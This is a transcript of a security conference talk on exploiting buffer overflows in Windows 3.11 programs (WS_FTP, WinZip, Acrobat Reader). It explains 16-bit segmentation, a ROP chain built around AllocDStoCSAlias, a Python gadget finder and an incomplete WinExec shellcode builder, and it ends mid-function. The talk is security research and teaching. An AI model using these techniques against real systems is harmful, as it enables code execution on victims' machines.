All right, next up we have Jacob Thompson giving a talk on exploiting overflows on Windows 3.1, which is personally one of my favorite OSes from back in the day, and I think this will be really interesting. Please welcome Jacob. All right, thanks everybody. This talk is called "From Far and Near: Exploiting Overflows on Windows 3.x," or in my case 3.11. If the title doesn't make sense now, it will once I get into the C code. We're here at ToorCon 20. I did this as a side project at the office over, I don't know, three or four weekends. It's relevant because what I do day to day is high-end custom security assessments, and every now and then there's a custom protocol, a custom operating system, or a custom programming library, and tearing that stuff apart is something I get to do. This was just another case of that. It's kind of a white-box security assessment, although I guess it was really black box: three 1990s-era internet applications that I got into, and we'll go through all the details later. I work at ISE, Independent Security Evaluators, where I do this kind of thing sometimes. We're also running the IoT hacking contest in the room next door. If anybody wants to get into that, it's another set of semi-obscure platforms, so if you're here, you might be interested. Some personal background: I've been doing this for six years, specifically in security consulting. I've counted about 100 engagements, assessments or reassessments, that I've had a major role in. My particular interests fit right in with this: reverse engineering, cryptography, and design flaws. Design flaws are interesting because a scanner often can't find them; I have some coworkers out here who are dealing with some of those right now.
And I have a retro interest: I didn't do programming or hacking on these platforms when they were popular, but I did use them, and it's interesting to see how things worked at the time in a way I obviously wouldn't have understood back then. Getting into this topic of 16-bit overflows, I think it's a little amusing that in popular culture, 16-bit and 8-bit mean tinny sound and pixelated images to a lot of people. In programming, of course, it has nothing to do with that. In fact, 16-bit color was a good thing, particularly in the days of Windows 3.1. Just a little diversion. I have a virtual machine here running Windows for Workgroups. If we switch over to it, we can click around and see what I have installed. I looked at several of these programs, some successfully and some unsuccessfully, as far as finding anything I could exploit in time. We had Acrobat Reader back then, just like now, and it was probably a lot faster and more user-friendly. mIRC was one I looked at. I know mIRC was rife with security holes, but I'm not sure buffer overflows were among them, and I'm not sure why; potentially they were using C++ with a good string library or something. Most of the problems I found in the three programs I did exploit were pretty trivial, like a file path that's too long: really obvious things. RealPlayer existed back then. I actually can't get it to run, because it requires 256 colors and I'm not in that mode with the drivers that are installed. Eudora Light was an email client. With that one, I got into some weird behavior with the POP and SMTP protocols, but I didn't get anything. I think I was overwriting a null byte or prematurely terminating a string; it didn't look overflow-worthy at the time.
WS_FTP was a popular FTP client. That was the most amenable one, and I came up with an interesting exploit for it. And WinZip, of course, was a pretty popular tool at least until Windows 2000 or XP, since zip support wasn't built in. Then there's the standard Windows stuff. The TCP/IP stack, of course, was an optional, often third-party, component at the time, and there was one on Microsoft's FTP server if you could supply an Ethernet driver. For dial-up, which is most likely what you would have had at the time, you were kind of on your own. I also have what became Visual Studio, though it wasn't necessarily branded that way at the time. It comes with the IDE, a debugger, and so forth, plus documentation that I think is actually higher quality than MSDN is today, in terms of "here's a function, these are the parameters it takes, and this is what it does." We'll get into that a little later, but I think it's better than what you can find today, because a lot of that has devolved into discussion forums: here's an opinion that's right, here's an opinion that's wrong, somebody else says no, that's absolutely the wrong way, here's some third-party library you should use, and so forth. All right, that's getting acquainted. So how and why did I get into this? The IoT stuff is a little bit relevant. We did some really weird things there back in 2013, when we did our first round of our own exploits. One of those, and it's all public, was an ASUS router and some similar brands. That market is interesting: a lot of vendors buy a development kit off the shelf with premade firmware and just brand it as their own version. We found a background service on some of these routers that, when you first booted up, looked around at which Wi-Fi channels were being used near your device and tried to pick one that was free.
So, like, channel 1, 6, or 11 on 2.4 GHz. One of those services also listened on the network for some reason. We think they were trying to create a localhost-bound socket, but they had it listening on every interface, and it was ARM. ARM, MIPS, and a bunch of other architectures are ones we got into and made overflows for. A lot of those share a property with what I'm going to get into here: if you were inventing buffer overflows at the time, those would have been somewhat challenging architectures to start with, whereas 32-bit x86 is a particularly easy one. I'm kind of wondering, historically, whether that's part of the reason things happened in the order they did, but we'll see. After working with some of those unusual payloads, I got to thinking: people must have written exploits for this platform at the time, right? But if you search the internet for something like Windows 3.1 shellcode, you get pretty useless results. It finds things like shellcode for an exploit in some application whose version happens to be 3.1, which has nothing to do with the OS. Every now and then a result alludes to a program that someone exploited on a 32-bit OS that was also available for a 16-bit OS, but I could not find working shellcode, a working exploit, or anything. I'm on page three or four of these search results now. So if anybody is interested in the white paper, which is about 20 pages and goes through this in much more detail: I guess PageRank is still a thing, so linking to it or posting it on social media could help bring it to the top. Same idea for "Windows 3.1 buffer overflow": you get some chat server version 3.1, and the OS doesn't even float to the top. So I was wondering, why has nobody written about this?
I thought of a couple of reasons, potentially valid and potentially not, but they're interesting to think about. One last thing first, though: the relevance of this. Obviously, this is not going to be a very useful skill to put into Metasploit and take to a penetration test. But I thought this was a little interesting: in 2015, some kiosks or systems that had been developed and deployed in the 90s were still in service, and they went down. It had something to do with weather at a French airport. So that hints at the relevance a little. Next, proving that an overflow could even come about; I alluded to that before with the applications. You think Windows 3.1, you think of a standalone desktop, and probably the majority were. But you also had NetWare or something, and late in this era, if you bought a used computer in the mid-90s, you could easily have an early Pentium running Netscape and Trumpet Winsock. Or Internet Explorer 5, which was available, interestingly enough; imagine trying to write the JavaScript interpreter for that and keep it compatible with both 16-bit and 32-bit. So could a buffer overflow situation arise? Here are the few I came up with that I'll exploit. For the FTP client, I just have a local FTP server running to test with; we'll get into it later. Anything dealing with file names is suspect: I think a lot of people assumed a file name would be at most about 256 characters, and when you go beyond that, things fall apart pretty quickly in at least two of the applications I show here. So this is the FTP client. This is Adobe Reader; this one has to do with hyperlinks that end up being too long, which we'll get into. And this one was WinZip.
That's just a zip file, but we'll get into parsing uuencoded files that have a file name inside, and that breaks pretty quickly. The interesting part is that I rediscovered all of these bugs, but it turns out they all had CVE numbers from somebody finding them and building an exploit for the 32-bit version in the late 90s or mid-2000s. So I was rediscovering blatant, trivial overflows that someone had found before, but nobody necessarily extended them to the 16-bit platforms at the time. Now, back to why this wasn't talked about earlier; here are my conjectures. First, maybe it wasn't interesting. Picture yourself writing "Smashing the Stack for Fun and Profit" in the mid-90s. What's more interesting: attacking a Solaris server from a low-end Windows machine, or the other way around? There were far better ways to go after a low-end Windows machine than what at the time would have seemed a far-fetched scenario: you run a malicious server, and the victim dials into the internet and opens this client in this exact order. Of course, a lot of that is more plausible now. Why attack a desktop when you can get a server on a T3? Second, maybe it was so obvious that nobody thought it was worth writing about. I guess it could be, but I doubt it. The third and last one, which I'd say is probably true, has to do with timing: this was a common platform in the mid-90s, 1994, 1995, 1996, depending on how well-to-do you were and whether you bought an NT 4 machine instead.
I'm not sure this is 100% true, and it would be interesting to do more research on it, but if you look at publicly available exploitation techniques in the mid-90s, when people might have cared about this, they just weren't advanced enough for ROP chains, getting around ASLR, or disabling memory protection and no-execute. Some of that exists here in a very weak form, by accident, as I'm going to show. My prediction is that those techniques weren't publicly known well enough at the time for people to build the exploits that I, standing on the shoulders of giants, was able to build in a couple of weekends. Maybe; we'll see. So how about we do an overflow, just to show it's possible? I'm going to do a live demo rather than use what I have in the slides, and build one on our own. We'll open Notepad, which is probably one of the least-changed applications since this time. A uuencoded file has "begin", the permissions, and a file name, then a bunch of uuencoded data, which is superficially similar to Base64 but uses characters that are more dangerous, and then "end" at the bottom. So we can build one: our mode, let's say, is 664 for Unix permissions, then a file name that we'll make longer. We won't even need any data, because it'll crash before then. Let's put some malicious stuff here. I've got a lowercase one in there. All right, kind of the classic demonstration. That's way too long. Let's save it as a uuencoded file that will open in WinZip, and go open it. It's shareware. I guess that's not really a thing anymore because of mobile platforms, where there's no friction to buying something. So we open it, and we have a problem: it first gives an error message saying it can't read the file, and when we hit OK, it crashes.
The interesting thing: on a 32-bit platform, when you do this kind of trivial AAAA overflow, where do you expect it to crash? At 41414141, right? Here we'll see it crash on the instruction before that, because of how memory segmentation works; I'll get more into that later. One interesting thing you can use: the crash reporter that ships with later versions of Windows, whose file name stayed Dr. Watson, or Dr. Watson NT, for a long time, exists here as a built-in crash-logging application. If we run it and keep it minimized when the crash happens, it intercepts the GPF that Windows triggers and logs a lot more useful information about it. Or not: we have to reboot, because some lock is still held somewhere. Thankfully, that takes a lot less time than it would have back then. A little video glitch that resolves itself. So start the crash reporter, then do this overflow. Now we can type some notes that go into the log file, and then browse to that file. That's an old entry; let's go to the bottom. When the program crashed, Dr. Watson logged a bunch of information: September 16th, that's today. The registers are logged. On 32-bit these would be EAX, EBX, and so forth. This is 16-bit, so, if that wasn't already obvious, the E wasn't there back then; it was added as a retrofit for 32-bit. BP is an interesting register that looks an awful lot like the pattern we just typed in, so BP was overwritten. Then there are some things that aren't as relevant today: the segment registers, which I'll get into, CS, DS, and SS, for code, data, and stack. And an interesting thing here: look at the permissions on those segments. The code segment is executable and readable. The data segment is readable and writable, and the stack is readable and writable.
So if the code is not writable and the stack is not executable, this sounds like the high-water mark for buffer overflow defenses on Windows until XP Service Pack 2, when the non-executable stack came back. I'll get into the details of that a little. If your code segment and your data segment don't overlap, you have some form of data execution prevention, by design or by accident. The other thing that rings similar today: you could have a 16-bit OS running on a 32-bit processor, just like you have a 32-bit OS running on a 64-bit processor. The kernel has to know it's actually running on 32-bit hardware; it doesn't just run the same way. So EAX and so forth still exist, and their top 16 bits are all zeros because they're not really being used. The stack pointer does have some high-order bits set, which is likely the result of some math going on with paging; virtual memory is all there, so it could be changing things. Here's the stack dump: look at SS:BP, with 4141, 4141, and other information. It also shows some code where it thinks the program was running. That's all interesting stuff coming just from Dr. Watson; we're not even in a debugger yet. One more demo before we get into actually constructing an exploit. I have an FTP server running on this machine with an anonymous directory, and I've put a file in there whose name is way too long for a Windows 3.1 program to handle. It's just the alphabet, but arranged creatively so you can figure out where you were, like some of the Metasploit tools that get creative with that. So what happens if we open the FTP client, browse to that directory, and try to open that file? For fun, let's do that in the debugger.
One thing that gets interesting here: the debugger wasn't even written by Microsoft. Microsoft was a much smaller company back then; in stock market terms, they were growth, not value. So we can open the FTP client here, and if you think WinDbg is primitive, look at what people dealt with back then. Nu-Mega Technologies apparently wrote it. It's slightly menu-driven, but in reality there are a bunch of commands you can type to get around much faster. So it's somewhat GUI-based, but in text mode, running over the top of your Windows desktop at the same time: a weird combination. We start the program with G and open it. I have two FTP servers running: one is a script specifically designed to exploit this, and one is just a normal FTP server. We'll use port 21, anonymous. Go in here, and we have a problem: as soon as we enter that directory, it crashes, which traps us into the debugger. We can look at the registers and the current instruction: AX, BX, CX, and so forth. The base pointer is overwritten with some ASCII characters, 5373. Those are valid. The crashing instruction is a return. This is what I was alluding to earlier: it crashes on the instruction that attempts to return to an invalid address, rather than overwriting the instruction pointer and then crashing at the invalid address. That is weird. We can look at what's on the stack, and I'll get a lot more into the details in a minute. It's a bunch of ASCII-looking values; let's display those as ASCII, and there you go. Interesting thing here: when the client was building the directory listing on the screen, it put the date and time in there, not even in separate columns, just with a vertical bar to separate them.
So we don't get a contiguous run of bytes we control for ROP chains, shellcode, and so forth after that point, because the date is in the middle. What I ended up having to do, and I'll get into this later, was get creative: jump over the region that has the date, and write an FTP server that sends a path so long you can't even create a file with that name on Linux. That's why we need a custom FTP implementation. Back to the slides: obviously these crashes are doing bad things that are worth further investigation. I have a more static version of it here. I skipped over this a little, but on 32-bit, what's the basic, trivial, no-ASLR, no-DEP overflow you would do? You have a program, presumably in C, maybe C++, that takes untrusted input (the command line, environment variables, standard input, a network socket, an untrusted file on disk) and tries to stash it on the stack somewhere with strcpy, scanf, or something similar; in the overflows I ran into, I'm pretty sure those functions were all over the place. You write more into a local buffer than it can hold. Because the stack grows down and the copy writes upward, the return address is what happens to be there, and you overwrite it with the address of code you've written, like shellcode, or something slightly more complicated, like a very useful instruction such as a jump to the stack. A trivially vulnerable program might look like that: ask for input and write it into a buffer without comparing how much was passed against how much the buffer can hold. We'll very quickly see that this doesn't work here, and over the next 10 minutes or so we'll get into why, based on memory layout: the complications of exploiting on a 16-bit platform.
So let's think about how we deal with memory on a 32-bit or even 64-bit platform. If you read the C standard, there are a lot of restrictions on what you're allowed to do with pointers, which you can usually get away with ignoring anyway. If you think about GCC and being cautious with pointers, there's the idea of aliasing, or strict aliasing, but that's pretty much it for most purposes. If you have pointer one and pointer two and want to compare them to see which is greater, that works. If you add a value to a pointer, you're pretty much going to get a valid address; potentially there's integer overflow, but that's about the only complication. A pointer is just a 32-bit value that points somewhere, you can do all the normal arithmetic on it, and there's a single linear memory map. That simple memory model ends up being called tiny. A 32-bit machine uses 32-bit memory addresses, so it can address 2^32 bytes, which is 2^2 times 2^30, or four gigabytes. You can do that pretty easily. A 64-bit machine, if there were no hardware constraints (which obviously still exist), could address 2^64 bytes. A 16-bit machine with this simple, straightforward memory model, with addresses from 0 to 2^16 minus 1, could address 2^16 bytes of memory. How much is 2^16? 64K. Even when x86 was being designed, that was already too small. So they could have increased the size of the registers, or done bank switching; what they ended up doing is segmentation. People who programmed this at the time have a lot of horror stories. One of the inspirations for this talk is the MSDN blog The Old New Thing, by someone who's been at Microsoft for a long time; it has a lot of horror stories about the kinds of things you had to do once what I'm about to show enters your program.
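The address-space arithmetic walked through above, written out (using binary prefixes, so "four gigabytes" is 4 GiB):

```latex
\begin{aligned}
2^{16} &= 65\,536 \text{ bytes} = 64\ \text{KiB} \\
2^{32} &= 2^{2} \cdot 2^{30} \text{ bytes} = 4\ \text{GiB} \\
2^{64} &= 2^{4} \cdot 2^{60} \text{ bytes} = 16\ \text{EiB}
\end{aligned}
```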
We've kind of been through the registers you deal with on 32-bit already. On 16-bit they're all smaller, 16 bits: instead of EIP you have IP, instead of EFLAGS you have FLAGS, and so forth. The other registers also exist on 32-bit: the segment registers. You care a lot about them in assembly programming, and that creeps its way in when you're developing in C. So first, segmentation. Every 16-bit program has to have a memory model chosen by the programmer, and each one is a tradeoff among code size, speed, and how big the program can get. In a segmented architecture, rather than one giant pool of memory numbered from zero up to the top address, you go through a segment, which the hardware maps to some linear region of memory, depending on how much RAM and ROM you have and so forth. So even though the normal size of a memory address you work with is 16 bits, in reality those are 16-bit offsets into one of a large number of segments you can work with at any given time. This would be a small- or medium-model program, which means code is stored over here, local variables are on the stack, here, and global variables go in that same region. What's good and bad about this? In the small model you can have up to 64K of code, because that's 2^16 (medium allows more than one code segment), and your stack and data combined can be up to 64K. In a small helper application like Notepad, that might be totally fine. For something like IE5, I highly doubt they managed to fit a JavaScript interpreter into 64K overall. If anyone has done programming with MASM, or ML, you'll often write a program and it'll spit a bunch of syntax errors at you that are resolved by putting the word OFFSET in, and this is where that comes from.
It clarifies to the assembler whether you're trying to use an address within the current segment or a 32-bit address consisting of a segment number and an offset. This is complicated to explain live and verbally; the white paper on the website goes through all the different memory models. If 64K isn't enough to hold your global and local variables combined, you can split them into two different regions. What's good about that? Now you have 64K of stack and 64K of data. But imagine passing a local variable to a function that accepts a pointer to a buffer it's going to write into. Either that function needs to handle the buffer whether it's on the stack or in the data segment, by taking a far pointer, or you need two different functions, one that takes near and one that takes far, each doing the right thing. Both of those approaches creep their way into the standard library. I have another program to show in this IDE; it's not an exploit. It takes the addresses of various things so we can look at how segment numbers are assigned and how they change at runtime. It's a fairly straightforward function. We use sprintf to basically printf into a message box, since there's no standard I/O. The things I'm taking addresses of are FGlobal, a global variable I declared as far; another global variable declared normally; a static variable inside the function; and a plain local variable on the stack. Then I took a few function pointers: one to WinMain, which is this program itself (casting it to far gets us the segment number); one to MessageBox, a library function from the USER library (user32 today); and one to LocalAlloc, a function from the KERNEL library (kernel32 today).
If we run this, it stuffs all of that into a big string and shows a message box, and there are a couple of things we can observe. Here we go. The format is segment:offset. The far global, because it was declared far, gets its own dedicated segment. That variable can be its own 64K memory region without interfering with anything else, but if you want to pass its address to other functions that read from or write into it, they need to accept a far pointer; otherwise the address gets truncated to 16 bits and used as an offset from the wrong place. The regular global variable went into the combined stack-plus-data segment, what the documentation calls the default data segment. So the global, the static, and the local all share the same segment number, and you can interchange those 16-bit addresses: if a function expects a pointer into the data and you give it one into the stack, it works just fine. Now the code at the bottom: WinMain's offset is zero, which makes sense, since it's the very first function in this object file. MessageBox is at 047F:AB5D and LocalAlloc is at 0117:0543. So the code segment of this executable, when it was loaded, was 24A7; the code segment of the USER library is 047F; and the code segment of the kernel is 0117. The interesting part is what changes and what doesn't if we run this program multiple times, which we can do. MessageBox and LocalAlloc stay the same, since they're in external libraries, while pretty much everything local to the program changes. It's not random; it's what I call a very weak ASLR. It's probably predictable, depending on how many programs the user is running and in what order they were started. But everything local to the program does move every time, without an obvious pattern, while MessageBox and LocalAlloc stay in the same place.
So what you have is an inverse ASLR, where the program moves around and the libraries stay in the same place. That's the reverse of the easy ASLR you get by just flipping it on with GCC or any modern build system out of the box, where the program stays in the same place and the libraries move around, unless it's a PIE. Here it's the other way around. There's an obvious reason it has to be that way: multiple copies of the same program can be running at once, and there's no memory protection separating them, so everything lives in one shared address space. What I'll end up doing in a bit is chaining ROP gadgets that aren't even part of the current process. That's weird, but it works. Back to the presentation. The distinction from what you're used to: in 32-bit code the segmentation is still there, but the code, data, stack, and extra segments have all been set to cover the entire memory space starting at zero. That's the tiny model (32-bit toolchains call it the flat model), which doesn't seem tiny on 32-bit; it just means the size of your registers is the size of your memory space. You can use tiny for MS-DOS programs, but not very well for Windows programs, because the Windows libraries themselves are too big to fit in 64K. So, the complication this creates, which I've shown a bit of already: pointers. If you made every pointer carry the full segment plus offset, what are the downsides? One is code size: every memory address takes twice as many bytes, or twice as many instructions, as it would otherwise. The other is speed: one of the particularly slow things on early x86 processors like the 286 or 386 is changing the value of a segment register, because the CPU has to consult tables set up by the operating system (and, on a 386, deal with paging and virtual memory) to determine whether this is your segment and what to load for its base and limit.
So they wanted to avoid changing the value of DS, ES, and so forth. A near pointer gives you those advantages: here's a variable, take its address, it's a pointer, it's good. The problem is that if a near pointer is dereferenced out of context, it's a disaster. It's like having a cluster of machines and using a pointer from a different machine, or processing a core dump with the wrong version of a program. So they end up making tradeoffs. For some functions, like fread, it doesn't make a whole lot of sense to create one version that only works within 64K and another that doesn't, so they just say: here's one version, and you have to use this kind of pointer. In other cases, they create different variants of a function depending on what size of data you're dealing with. That's another thing we can look at in the documentation. What's a function that would have to deal with these complications a lot? strdup is one. On a flat memory model it's pretty simple: it takes a pointer to a string, uses malloc to allocate enough memory to hold a copy, makes the copy, and returns the pointer, which you later free. With these complications, you need three versions. The first is the one you're used to: depending on the build options used to compile your program, it does the right thing. If your program is tiny, everything is near; if it's huge, everything is far; in between, it depends on the memory model you've chosen, the details of which are in the white paper. Then there are two more versions, _fstrdup and _nstrdup, which give you a different kind of pointer as the return value. Both take a far pointer.
But when they call malloc, they end up calling different versions of malloc, because there's more than one heap: a near heap and a far heap, and each version allocates from the correct place. What you have to do as a programmer is remember, when you free, where you got the pointer from. This somewhat reminds me of Windows programming even today: if you don't link to the C library correctly, you can have a program and a DLL that are linked to slightly different versions of MSVCRT, and then malloc comes from one version and free from another, which can be another disaster. Reading these declarations also reminds me of dealing with const in C++: there's const int *, int const *, and int * const, and the third one means something completely different from the first two. So char far * means that the return value is going to be a 32-bit segment-and-offset value. The far that comes after the star says that the function itself has a 32-bit address, so it can be called from anywhere in the program, as opposed to a local function, like a static one that can only be called from the current file. So making a function static in a 16-bit program can trigger a bunch of compiler optimizations that aren't necessarily relevant on 32-bit, because static guarantees it won't be called from outside the file, unless you take a function pointer to it. Both of them, as I said, take a far pointer and give you back the right kind of pointer depending on what you've asked for. So how about functions? As we just saw, you can have a far function that returns a near pointer, a near function that returns a far pointer, or the other two cases, so it's two squared, four possibilities. Here's where this becomes relevant: a far function means that the function calling it may not be in the same code segment.
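The near-heap/far-heap bookkeeping can be sketched as a toy Python model. `ToyHeap` and `toy_strdup` are hypothetical stand-ins, not a reproduction of the C runtime's allocators; each toy heap owns a disjoint, made-up address range so a free against the wrong heap can be detected.

```python
class ToyHeap:
    """Bump allocator standing in for the near or the far heap."""

    def __init__(self, name: str, start: int, end: int):
        self.name, self.end = name, end
        self._next = start
        self._live = set()   # pointers handed out and not yet freed

    def malloc(self, size: int) -> int:
        if self._next + size > self.end:
            raise MemoryError(f"{self.name} heap exhausted")
        ptr = self._next
        self._next += size
        self._live.add(ptr)
        return ptr

    def free(self, ptr: int) -> None:
        # A real C runtime generally won't catch this; the heap just gets corrupted.
        # The toy model raises instead so the mistake is visible.
        if ptr not in self._live:
            raise ValueError(f"{ptr:#x} did not come from the {self.name} heap")
        self._live.remove(ptr)

def toy_strdup(heap: ToyHeap, memory: dict, s: bytes) -> int:
    """strdup as described: allocate len + 1 bytes, copy, return the pointer."""
    ptr = heap.malloc(len(s) + 1)
    memory[ptr] = s + b"\x00"
    return ptr

if __name__ == "__main__":
    near = ToyHeap("near", 0x1000, 0x10000)     # inside the 64K data segment
    far = ToyHeap("far", 0x100000, 0x200000)    # somewhere else entirely
    mem = {}
    p = toy_strdup(near, mem, b"hello")
    try:
        far.free(p)                             # wrong heap
    except ValueError as err:
        print(err)                              # 0x1000 did not come from the far heap
    near.free(p)                                # right heap: fine
```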
So when it gets called, the caller needs to know the entire 32-bit address of that function, and when it returns, it needs to switch the code segment back. That means the size of a return address on the stack, two bytes or four, depends on how the function was called. Thankfully, that is always the same for a given function, because it's fixed by how the function was declared. Sometimes this might be suboptimal: if you call a far function that happens to be in the same code segment, you swap out the register anyway. But it works; it's just more flexible. Why is this relevant? Well, in a buffer overflow, the return address is something we particularly care about. So how does all this affect exploitability? As I alluded to, this is kind of like 1993-era, very weak versions of ASLR and DEP. ASLR meaning that you can't assume where the stack is, and it's the upper bits, the selector, that differ rather than the lower bits. You can't assume where the code segment of the current program is, but you can assume where the common libraries are, so that's what I'll use. And DEP meaning you can't just put shellcode on the stack and call it or jump to it; you'll have to mark the stack as executable first. I'll have to speed up a little bit. For ASLR: there's no memory protection, and a segment selector is unique across all running processes. It can be bypassed pretty easily by knowing where these very large libraries are, which have lots of useful things, like loading a segment register or finding where the stack is, that you can call from anywhere with ROP. For this version of DEP: you can't have a code segment that's also writable. What you can do is have a code selector and a data selector that point to the same memory, so that you can write through one and execute through the other, in a roundabout way. So wait a minute: why wasn't DEP there the whole time?
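A minimal Python sketch of why the near/far distinction matters to an overflow, assuming a plain `push bp; mov bp, sp` prologue (real Windows far-function prologues save a bit more, which shifts the buffer-to-BP distance). `overflow_payload` and its parameters are hypothetical: it lays out filler, a replacement BP, and a return address that is 2 bytes for a near return or 4 bytes for a far one, offset first and selector second, the order RETF pops them.

```python
import struct
from typing import Optional

def first_arg_offset(far_call: bool) -> int:
    """Offset from BP to the first stack argument after `push bp; mov bp, sp`."""
    saved_bp = 2
    return_address = 4 if far_call else 2   # far: IP then CS; near: IP only
    return saved_bp + return_address

def overflow_payload(buf_to_bp: int, new_bp: int, ret_off: int,
                     ret_sel: Optional[int] = None, filler: bytes = b"A") -> bytes:
    """Single-byte filler up to the saved BP, then a new BP, then the return address."""
    payload = filler * buf_to_bp
    payload += struct.pack("<H", new_bp)        # overwrites the saved BP
    payload += struct.pack("<H", ret_off)       # IP, popped first by RET or RETF
    if ret_sel is not None:
        payload += struct.pack("<H", ret_sel)   # CS, popped second, by RETF only
    return payload
```

Get the return-address size wrong and everything after it, including any ROP chain, is off by two bytes.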
When you switched to 32-bit and went to the tiny memory model, you couldn't do this anymore, because you've implicitly created a situation where everything that's executable can also be accessed through the data segment. And paging can do read-write or read-only, but it couldn't do writable-but-not-executable until they added the NX bit to the processor, around the Pentium 4 or so. Calling conventions are another complication. With the one we're used to, cdecl, when you call a C function the arguments are pushed starting from the last one and ending with the first. What's the reason for that? Variable numbers of arguments. A function like printf is expected to figure out how many arguments there are by looking at the first one, so the first argument had better be somewhere it knows about, and pushing in reverse order puts it at a fixed place right above the return address. 16-bit code on Windows tends to use a different calling convention, Pascal. One of the differences is that you pass arguments from left to right, so they end up upside down. The other is that the callee, rather than the caller, is responsible for popping the arguments off the stack. Why would they do that? Moving the stack cleanup code from the caller to the callee makes the code somewhat smaller, supposedly small enough to reduce the number of floppy disks the first version of Windows needed to fit on, or something along those lines. That might be an urban legend, but the code-size part is true. I've kind of done this already, so these are just some screenshots of what we did: we were in the debugger, and you see 41414141 everywhere. Now, building the ROP chain: what we've observed and what we need to do. The problem is that our shellcode is on the stack, and we don't know the segment selector of the stack, so we need to figure that out. Thankfully there are ROP gadgets we can find that take SS and put it somewhere convenient. The other thing we need is a different view of the stack, but marked as executable.
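The difference between the two conventions can be modeled in a few lines of Python. This is an illustration only: `push_order`, `stack_from_top`, and `cleanup` are made-up helpers, and the caller supplies the total argument size in bytes.

```python
def push_order(args: list, convention: str) -> list:
    """Order in which the caller pushes the arguments."""
    if convention == "cdecl":
        return list(reversed(args))   # last argument pushed first
    if convention == "pascal":
        return list(args)             # first argument pushed first
    raise ValueError(f"unknown convention {convention!r}")

def stack_from_top(args: list, convention: str) -> list:
    """Arguments as the callee sees them, from the one nearest the
    return address (lowest address) upward."""
    return list(reversed(push_order(args, convention)))

def cleanup(arg_bytes: int, convention: str, far: bool = True) -> str:
    """Who removes the arguments, and with what instruction."""
    ret = "retf" if far else "ret"
    if convention == "cdecl":
        return f"callee: {ret}; caller: add sp, {arg_bytes}"
    return f"callee: {ret} {arg_bytes}"
```

With cdecl, `stack_from_top(["fmt", "a", "b"], "cdecl")` puts `"fmt"` next to the return address; with Pascal it comes out as `["b", "a", "fmt"]`, which is the "upside down" layout to keep in mind when hand-building calls to Windows APIs.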
And thankfully there's a nice function in the API. If I can get to the right section... oops, I closed the entire VM. So there's a function called AllocDStoCSAlias, which is basically the VirtualProtect of 1993. Time is a little short, but in the white paper I have a nice diagram that goes through all of this. What we end up doing is custom-made for the FTP client. The first thing we do is overwrite BP. You can actually somewhat hard-code offsets into the stack, assuming the user uses the program the same way you did, because all the randomness or uncertainty is in the selector, not the offset. Then this mov ax, ss gadget pulls the stack selector into AX, and we put it somewhere convenient, at an offset from BP. We take that stack selector and pass it to AllocDStoCSAlias, with some complications to deal with null bytes. What that function returns is a different segment selector that, when loaded, gives you the same view as the stack but marked as executable. So we can hard-code the offset to the shellcode, and now we have the selector done dynamically. And finally there's this push ax, push bx, and instead of popping them, a far return: you've loaded an address onto the stack and then jumped to it as a far pointer. This is a more long-winded version of that. It goes explicitly through the individual gadgets I found. The way I found them was dumping the code segments of USER and KERNEL to disk and then writing a Python script that looks for a return instruction and then looks backward for something convenient. So that's exactly what we do: reposition the stack, figure out where SS is and put it somewhere good, pass it to this function that's the VirtualProtect of 1993, and then jump to offset BX in selector AX, where BX is the offset we already know and AX is the executable view of the stack we just obtained dynamically. The other part we need is shellcode, which is comparatively easy.
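The gadget search described above can be sketched in Python roughly like this. It is a minimal version under stated assumptions, not the script from the talk: it scans a raw dump of a code segment for RET (`0xC3`) and RETF (`0xCB`) bytes and, for each one, checks up to `max_back` bytes back for a wanted opcode sequence, here `mov ax, ss` (`8C D0`). The dump file name is hypothetical, and every hit still needs a disassembler check, since the bytes in between may decode to something unhelpful.

```python
import sys
from typing import Iterator, Tuple

# RET imm16 (0xC2) and RETF imm16 (0xCA) could be added the same way.
RET_OPCODES = {0xC3: "ret", 0xCB: "retf"}
MOV_AX_SS = bytes([0x8C, 0xD0])   # mov ax, ss

def find_gadgets(code: bytes, wanted: bytes, max_back: int = 8) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, bytes) for every sequence that starts with `wanted`
    and ends at a RET/RETF no more than `max_back` bytes later."""
    for i, b in enumerate(code):
        if b not in RET_OPCODES:
            continue
        for back in range(len(wanted), max_back + 1):
            start = i - back
            if start < 0:
                break
            if code[start:start + len(wanted)] == wanted:
                yield start, code[start:i + 1]

if __name__ == "__main__" and len(sys.argv) > 1:
    # usage (hypothetical file name): python find_gadgets.py user_seg1.bin
    with open(sys.argv[1], "rb") as f:
        data = f.read()
    for off, seq in find_gadgets(data, MOV_AX_SS):
        print(f"{off:04x}: {seq.hex(' ')}")
```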
I just did a calculator one. All I did was figure out the address of WinExec in the same way, 028F, and make shellcode that sets up a WinExec call on the stack and then jumps to it. The only complication is the Pascal convention: you have to push things backward from what you're used to. So a pre-recorded demo here shows that it actually works. Oh, it's a video. A little bit glitchy, but it works. This is connected to a Python script I wrote specifically to serve as a malicious FTP server that handles all the binary characters the correct way and so forth. And there you go: it crashes and the calculator opens. That CVE is from when somebody else found this bug in the 32-bit version, so I don't want to claim it: technically it's not a new vulnerability, it's a new exploit, I guess. I've got to wrap up here, but these static images show that the link overflow in Acrobat Reader also works. That one unfortunately hangs the machine, but if you press Ctrl+Alt+Delete to get to the blue screen and then dismiss it, you get control back and the WinExec call ends up working as well. Getting rid of that message would be a whole diversion I didn't get into: it's possibly a modal dialog, so what if it hangs the machine while you're trying to run a remote shell? Imagine trying to do a remote shell on Windows 3.1 in the first place, much less maliciously. So, wrapping up here: in case there are any questions, I'll be over in the IoT Village after this, since I'm bumping up against the 50 minutes. As for future work: unfortunately, with 64-bit Windows this stopped being relevant, since it can't run 16-bit programs at all, but what about 16-bit programs running on a 32-bit OS? What if you have a 32-bit Windows with ASLR, like Vista or 7? How does it do ASLR for 16-bit programs? Does it even attempt that?
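A rough Python sketch of assembling such a stub by hand, to show the Pascal ordering. It swaps in a direct far `call` (`9A`) rather than the push-and-jump described above, assumes the command string sits on the stack so `push ss` supplies its selector, and uses placeholder values for the string offset and for WinExec's selector:offset; it is not the talk's actual shellcode. WinExec takes `(lpCmdLine, nCmdShow)` and is far Pascal, so `lpCmdLine` is pushed first (selector, then offset) and WinExec pops its own arguments.

```python
import struct

def winexec_stub(cmd_offset: int, winexec_sel: int, winexec_off: int, show: int = 1) -> bytes:
    """Build 16-bit machine code for WinExec(lpCmdLine, nCmdShow), Pascal order."""
    code = bytearray()
    code += b"\x16"                                                  # push ss    ; lpCmdLine selector
    code += b"\x68" + struct.pack("<H", cmd_offset)                  # push imm16 ; lpCmdLine offset
    code += b"\x68" + struct.pack("<H", show)                        # push imm16 ; nCmdShow
    code += b"\x9a" + struct.pack("<HH", winexec_off, winexec_sel)   # call far sel:off
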